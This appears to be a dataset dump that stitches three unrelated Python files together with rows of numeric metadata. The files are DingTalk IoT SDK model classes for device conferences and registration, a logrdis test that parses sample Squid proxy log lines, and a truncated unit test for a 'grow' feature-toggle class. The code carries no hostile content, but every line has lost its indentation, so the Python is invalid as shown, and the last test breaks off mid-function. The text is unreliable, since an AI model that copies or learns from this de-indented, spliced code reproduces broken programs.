self.body = temp_model.from_map(m['body'])
return self
class DeviceConferenceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class DeviceConferenceRequest(TeaModel):
def __init__(
self,
conf_title: str = None,
conference_id: str = None,
conference_password: str = None,
device_ids: List[str] = None,
):
# 会议主题,最多不能超20个中文。
self.conf_title = conf_title
# 钉钉会议ID,加入已存在的会议必填。
self.conference_id = conference_id
# 钉钉会议密码,加入已存在的会议必填。
self.conference_password = conference_password
# 需要邀请的设备ID,最多5个。
self.device_ids = device_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.conf_title is not None:
result['confTitle'] = self.conf_title
if self.conference_id is not None:
result['conferenceId'] = self.conference_id
if self.conference_password is not None:
result['conferencePassword'] = self.conference_password
if self.device_ids is not None:
result['deviceIds'] = self.device_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('confTitle') is not None:
self.conf_title = m.get('confTitle')
if m.get('conferenceId') is not None:
self.conference_id = m.get('conferenceId')
if m.get('conferencePassword') is not None:
self.conference_password = m.get('conferencePassword')
if m.get('deviceIds') is not None:
self.device_ids = m.get('deviceIds')
return self
class DeviceConferenceResponseBody(TeaModel):
def __init__(
self,
conference_id: str = None,
):
# 会议ID
self.conference_id = conference_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.conference_id is not None:
result['conferenceId'] = self.conference_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('conferenceId') is not None:
self.conference_id = m.get('conferenceId')
return self
class DeviceConferenceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: DeviceConferenceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = DeviceConferenceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class RegisterDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class RegisterDeviceRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
id: str = None,
device_name: str = None,
nick_name: str = None,
location: str = None,
device_status: int = None,
device_type: str = None,
device_type_name: str = None,
parent_id: str = None,
product_type: str = None,
live_url: str = None,
):
# 钉钉组织id
self.corp_id = corp_id
# 设备id
self.id = id
# 设备名称
self.device_name = device_name
# 设备昵称
self.nick_name = nick_name
# 设备地址
self.location = location
# 设备状态 0:在线 1:离线
self.device_status = device_status
# 设备类型
self.device_type = device_type
# 设备类型名称
self.device_type_name = device_type_name
# 设备父节点id
self.parent_id = parent_id
# 设备类型 摄像头:CAMERA 其它:OTHERS
self.product_type = product_type
# 视频流地址
self.live_url = live_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.id is not None:
result['id'] = self.id
if self.device_name is not None:
result['deviceName'] = self.device_name
if self.nick_name is not None:
result['nickName'] = self.nick_name
if self.location is not None:
result['location'] = self.location
if self.device_status is not None:
result['deviceStatus'] = self.device_status
if self.device_type is not None:
result['deviceType'] = self.device_type
if self.device_type_name is not None:
result['deviceTypeName'] = self.device_type_name
if self.parent_id is not None:
result['parentId'] = self.parent_id
if self.product_type is not None:
result['productType'] = self.product_type
if self.live_url is not None:
result['liveUrl'] = self.live_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('deviceName') is not None:
self.device_name = m.get('deviceName')
if m.get('nickName') is not None:
self.nick_name = m.get('nickName')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('deviceStatus') is not None:
self.device_status = m.get('deviceStatus')
if m.get('deviceType') is not None:
self.device_type = m.get('deviceType')
if m.get('deviceTypeName') is not None:
self.device_type_name = m.get('deviceTypeName')
if m.get('parentId') is not None:
self.parent_id = m.get('parentId')
if m.get('productType') is not None:
self.product_type = m.get('productType')
if m.get('liveUrl') is not None:
self.live_url = m.get('liveUrl')
return self
class RegisterDeviceResponseBody(TeaModel):
def __init__(
self,
device_id: str = None,
):
# 设备id
self.device_id = device_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_id is not None:
result['deviceId'] = self.device_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceId') is not None:
self.device_id = m.get('deviceId')
return self
class RegisterDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: RegisterDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = RegisterDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class BatchRegisterDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class BatchRegisterDeviceRequestDevices(TeaModel):
def __init__(
self,
device_id: str = None,
device_name: str = None,
device_status: int = None,
device_type: str = None,
device_type_name: str = None,
product_type: str = None,
live_url: str = None,
parent_id: str = None,
location: str = None,
extra_data: Dict[str, Any] = None,
):
# 设备ID。
self.device_id = device_id
# 设备名称。
self.device_name = device_name
# 设备状态 0:在线 1:离线
self.device_status = device_status
# 设备类型,自定义传入,最多128个字节。
self.device_type = device_type
# 设备类型名称,自定义传入,最多128个字节,与deviceType一一对应。
self.device_type_name = device_type_name
# 产品类型 CAMERA:摄像头,可看直播 OTHERS:非摄像头
self.product_type = product_type
# 视频流地址直播流地址,支持rtmp、flv、hls等格式,需要https协议。
self.live_url = live_url
# 父设备ID。
self.parent_id = parent_id
# 设备地址。
self.location = location
# 第三方平台定制参数,企业内部系统忽略。
self.extra_data = extra_data
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_id is not None:
result['deviceId'] = self.device_id
if self.device_name is not None:
result['deviceName'] = self.device_name
if self.device_status is not None:
result['deviceStatus'] = self.device_status
if self.device_type is not None:
result['deviceType'] = self.device_type
if self.device_type_name is not None:
result['deviceTypeName'] = self.device_type_name
if self.product_type is not None:
result['productType'] = self.product_type
if self.live_url is not None:
result['liveUrl'] = self.live_url
if self.parent_id is not None:
result['parentId'] = self.parent_id
if self.location is not None:
result['location'] = self.location
if self.extra_data is not None:
result['extraData'] = self.extra_data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceId') is not None:
self.device_id = m.get('deviceId')
if m.get('deviceName') is not None:
self.device_name = m.get('deviceName')
if m.get('deviceStatus') is not None:
self.device_status = m.get('deviceStatus')
if m.get('deviceType') is not None:
self.device_type = m.get('deviceType')
if m.get('deviceTypeName') is not None:
self.device_type_name = m.get('deviceTypeName')
if m.get('productType') is not None:
self.product_type = m.get('productType')
if m.get('liveUrl') is not None:
self.live_url = m.get('liveUrl')
if m.get('parentId') is not None:
self.parent_id = m.get('parentId')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('extraData') is not None:
self.extra_data = m.get('extraData')
return self
class BatchRegisterDeviceRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
devices: List[BatchRegisterDeviceRequestDevices] = None,
):
# 钉钉物联组织ID, 第三方平台必填,企业内部系统忽略。
self.corp_id = corp_id
# 设备列表。
self.devices = devices
def validate(self):
if self.devices:
for k in self.devices:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
result['devices'] = []
if self.devices is not None:
for k in self.devices:
result['devices'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
self.devices = []
if m.get('devices') is not None:
for k in m.get('devices'):
temp_model = BatchRegisterDeviceRequestDevices()
self.devices.append(temp_model.from_map(k))
return self
class BatchRegisterDeviceResponseBody(TeaModel):
def __init__(
self,
device_ids: List[str] = None,
):
# 注册成功的设备ID列表。
self.device_ids = device_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_ids is not None:
result['deviceIds'] = self.device_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceIds') is not None:
self.device_ids = m.get('deviceIds')
return self
class BatchRegisterDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: BatchRegisterDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = BatchRegisterDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class BatchRegisterEventTypeHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class BatchRegisterEventTypeRequestEventTypes(TeaModel):
def __init__(
self,
event_type: str = None,
event_type_name: str = None,
):
# 事件类型(唯一),最长20个字符。
self.event_type = event_type
# 事件类型名称,长度4-20个字符,一个中文汉字算2个字符。
self.event_type_name = event_type_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.event_type is not None:
result['eventType'] = self.event_type
if self.event_type_name is not None:
result['eventTypeName'] = self.event_type_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('eventType') is not None:
self.event_type = m.get('eventType')
if m.get('eventTypeName') is not None:
self.event_type_name = m.get('eventTypeName')
return self
class BatchRegisterEventTypeRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
event_types: List[BatchRegisterEventTypeRequestEventTypes] = None,
):
# 钉钉物联组织ID, 第三方平台必填,企业内部系统忽略。
self.corp_id = corp_id
# 事件类型列表,最多支持添加500个。
self.event_types = event_types
def validate(self):
if self.event_types:
for k in self.event_types:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
result['eventTypes'] = []
if self.event_types is not None:
for k in self.event_types:
result['eventTypes'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
self.event_types = []
if m.get('eventTypes') is not None:
for k in m.get('eventTypes'):
temp_model = BatchRegisterEventTypeRequestEventTypes()
self.event_types.append(temp_model.from_map(k))
return self
class BatchRegisterEventTypeResponseBody(TeaModel):
def __init__(
self,
event_types: List[str] = None,
):
# 注册成功的事件类型列表。
self.event_types = event_types
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.event_types is not None:
result['eventTypes'] = self.event_types
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('eventTypes') is not None:
self.event_types = m.get('eventTypes')
return self
class BatchRegisterEventTypeResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: BatchRegisterEventTypeResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = BatchRegisterEventTypeResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class BatchUpdateDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class BatchUpdateDeviceRequestDevices(TeaModel):
def __init__(
self,
device_id: str = None,
device_name: str = None,
location: str = None,
device_status: int = None,
live_url: str = None,
extra_data: Dict[str, Any] = None,
):
# 设备ID。
self.device_id = device_id
# 设备名称。
self.device_name = device_name
# 设备地址。
self.location = location
# 设备状态 0:在线 1:离线
self.device_status = device_status
# 视频流地址直播流地址,支持rtmp、flv、hls等格式,需要https协议。
self.live_url = live_url
# 第三方平台定制参数,企业内部系统忽略。
self.extra_data = extra_data
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_id is not None:
result['deviceId'] = self.device_id
if self.device_name is not None:
result['deviceName'] = self.device_name
if self.location is not None:
result['location'] = self.location
if self.device_status is not None:
result['deviceStatus'] = self.device_status
if self.live_url is not None:
result['liveUrl'] = self.live_url
if self.extra_data is not None:
result['extraData'] = self.extra_data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceId') is not None:
self.device_id = m.get('deviceId')
if m.get('deviceName') is not None:
self.device_name = m.get('deviceName')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('deviceStatus') is not None:
self.device_status = m.get('deviceStatus')
if m.get('liveUrl') is not None:
self.live_url = m.get('liveUrl')
if m.get('extraData') is not None:
self.extra_data = m.get('extraData')
return self
class BatchUpdateDeviceRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
devices: List[BatchUpdateDeviceRequestDevices] = None,
):
# 钉钉物联组织ID, 第三方平台必填,企业内部系统忽略。
self.corp_id = corp_id
# 设备列表。
self.devices = devices
def validate(self):
if self.devices:
for k in self.devices:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
result['devices'] = []
if self.devices is not None:
for k in self.devices:
result['devices'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
self.devices = []
if m.get('devices') is not None:
for k in m.get('devices'):
temp_model = BatchUpdateDeviceRequestDevices()
self.devices.append(temp_model.from_map(k))
return self
class BatchUpdateDeviceResponseBody(TeaModel):
def __init__(
self,
device_ids: List[str] = None,
):
# 修改成功的设备ID列表。
self.device_ids = device_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_ids is not None:
result['deviceIds'] = self.device_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceIds') is not None:
self.device_ids = m.get('deviceIds')
return self
class BatchUpdateDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: BatchUpdateDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = BatchUpdateDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class BindSystemHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class BindSystemRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
auth_code: str = None,
client_id: str = None,
client_name: str = None,
extra_data: Dict[str, Any] = None,
):
# 三方平台的用户的钉钉物联组织ID。
self.corp_id = corp_id
# 与三方平台绑定验证的临时授权码。
self.auth_code = auth_code
# 三方平台的用户ID。
self.client_id = client_id
# 三方平台的用户名。
self.client_name = client_name
# 三方平台协定的其它参数。
self.extra_data = extra_data
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.auth_code is not None:
result['authCode'] = self.auth_code
if self.client_id is not None:
result['clientId'] = self.client_id
if self.client_name is not None:
result['clientName'] = self.client_name
if self.extra_data is not None:
result['extraData'] = self.extra_data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('authCode') is not None:
self.auth_code = m.get('authCode')
if m.get('clientId') is not None:
self.client_id = m.get('clientId')
if m.get('clientName') is not None:
self.client_name = m.get('clientName')
if m.get('extraData') is not None:
self.extra_data = m.get('extraData')
return self
class BindSystemResponseBody(TeaModel):
def __init__(
self,
corp_id: str = None,
client_id: str = None,
):
# 钉钉物联组织ID。
self.corp_id = corp_id
# 三方平台的用户ID。
self.client_id = client_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.client_id is not None:
result['clientId'] = self.client_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('clientId') is not None:
self.client_id = m.get('clientId')
return self
class BindSystemResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: BindSystemResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = BindSystemResponseBody()
self.body = temp_model.from_map(m['body'])
return self
| 29.76609
| 84
| 0.571166
| 5,402
| 43,012
| 4.360237
| 0.040541
| 0.048612
| 0.087501
| 0.059862
| 0.84699
| 0.823512
| 0.807251
| 0.795831
| 0.783094
| 0.767895
| 0
| 0.001177
| 0.328141
| 43,012
| 1,444
| 85
| 29.786704
| 0.813897
| 0.024226
| 0
| 0.884979
| 1
| 0
| 0.072912
| 0.015465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120172
| false
| 0.025751
| 0.001717
| 0
| 0.24206
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
753d6ef78a8b8c668ebf9d3b7a37c711435f44c7
| 3,606
|
py
|
Python
|
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | null | null | null |
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | 1
|
2021-03-25T21:47:26.000Z
|
2021-03-25T21:47:26.000Z
|
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | null | null | null |
"""Test the log on a real life squid sample."""
import re
from ..logrdis.log import find_match
SAMPLES="""time 2017-10-22_18:20:05+0000 time_response 60 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.228:443 user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 135 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TCP_MISS http_status_code 200 http_reply_size 69919 http_request_method GET http_request_url https://www.google.com/ user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type text/html\n'b'time 2017-10-22_18:20:06+0000 time_response 5 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 1 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\ntime 2017-10-22_18:20:06+0000 time_response 0 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 42 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TCP_MISS http_status_code 204 http_reply_size 374 http_request_method POST http_request_url https://www.google.com/gen_204? user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type text/html\n'b'time 2017-10-22_18:20:06+0000 time_response 1 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 3 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\ntime 2017-10-22_18:20:06+0000 time_response 0 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -"""
def test_find_match(test_yaml):
"""Test that find_match returns the expected entries."""
cfg = test_yaml()
for sample in SAMPLES.split('\n'):
tablename, match = find_match(sample, cfg)
assert tablename == "access_logs", "Invalid table matched"
assert re.search("[\d\-\:\+]+", match.group("time"))
assert re.search("\d+", match.group("time_response"))
assert re.search("[\d\:\-]+", match.group("mac_source"))
assert re.search("[\d\.\-]+", match.group("ip_source"))
assert re.search("[\d\.\-]+", match.group("http_request_url"))
assert re.search("[\d\.\-]+", match.group("ip_destination"))
| 163.909091
| 2,841
| 0.795341
| 688
| 3,606
| 3.859012
| 0.156977
| 0.078719
| 0.052731
| 0.033898
| 0.853107
| 0.853107
| 0.836535
| 0.751036
| 0.751036
| 0.751036
| 0
| 0.147004
| 0.102052
| 3,606
| 21
| 2,842
| 171.714286
| 0.672946
| 0.025513
| 0
| 0
| 0
| 0.071429
| 0.849843
| 0.061661
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f38ff5b0744cbf6b674f062f3f445e992690ba20
| 2,885
|
py
|
Python
|
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
"""Tests for features."""
import unittest
from grow.common import features
class FeaturesTestCase(unittest.TestCase):
"""Test the features control."""
def test_default_enabled(self):
"""Does the default enabled work?"""
feat = features.Features(default_enabled=True)
self.assertTrue(feat.is_enabled('unknown'))
def test_default_enabled_false(self):
"""Does the default disabled work?"""
feat = features.Features(default_enabled=False)
self.assertFalse(feat.is_enabled('unknown'))
def test_is_disabled_disabled(self):
"""Enabled features."""
feat = features.Features(disabled=['a', 'b'])
self.assertTrue(feat.is_disabled('a'))
self.assertTrue(feat.is_disabled('b'))
self.assertFalse(feat.is_disabled('c'))
def test_is_disabled_disabled_with_default_enabled_false(self):
"""Enabled features."""
feat = features.Features(disabled=['a', 'b'], default_enabled=False)
self.assertTrue(feat.is_disabled('a'))
self.assertTrue(feat.is_disabled('b'))
self.assertTrue(feat.is_disabled('c'))
def test_is_disabled_enabled(self):
"""Enabled features."""
feat = features.Features(enabled=['a', 'b'])
self.assertFalse(feat.is_disabled('a'))
self.assertFalse(feat.is_disabled('b'))
self.assertFalse(feat.is_disabled('c'))
def test_is_disabled_enabled_with_default_enabled_false(self):
"""Enabled features."""
feat = features.Features(enabled=['a', 'b'], default_enabled=False)
self.assertFalse(feat.is_disabled('a'))
self.assertFalse(feat.is_disabled('b'))
self.assertTrue(feat.is_disabled('c'))
def test_is_enabled_disabled(self):
"""Enabled features."""
feat = features.Features(disabled=['a', 'b'])
self.assertFalse(feat.is_enabled('a'))
self.assertFalse(feat.is_enabled('b'))
self.assertTrue(feat.is_enabled('c'))
def test_is_enabled_disabled_with_default_enabled_false(self):
"""Enabled features."""
feat = features.Features(disabled=['a', 'b'], default_enabled=False)
